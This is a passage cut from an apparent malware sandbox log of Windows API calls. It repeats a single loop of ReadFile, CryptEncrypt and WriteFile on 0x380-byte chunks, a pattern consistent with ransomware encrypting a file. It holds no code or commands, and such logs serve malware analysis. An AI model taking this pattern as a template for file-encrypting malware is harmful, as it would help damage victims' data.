lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.060] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.060] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.061] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.061] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.061] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.061] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.061] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.061] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.061] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.061] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.061] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.061] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.061] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.061] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.061] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.062] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.062] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.062] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.062] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.062] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.062] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.062] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.062] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.062] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.062] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.062] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.062] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.063] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.063] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.063] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.063] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.063] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.063] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.063] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.063] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.063] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.063] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.063] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.063] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.063] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.064] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.064] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.064] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.064] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.064] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.064] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.064] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.064] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.064] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.064] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.064] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.064] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.064] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.065] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.065] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.065] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.065] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.065] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.065] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.065] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.065] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.065] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.066] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.066] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.066] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.066] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.066] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.066] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.066] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.066] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.066] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.066] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.066] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.066] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.066] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.066] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.066] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.067] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.067] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.067] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.067] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.067] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.067] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.067] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.067] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.067] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.067] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.067] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.067] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.067] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.067] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.067] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.068] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.068] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.068] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.068] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.068] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) 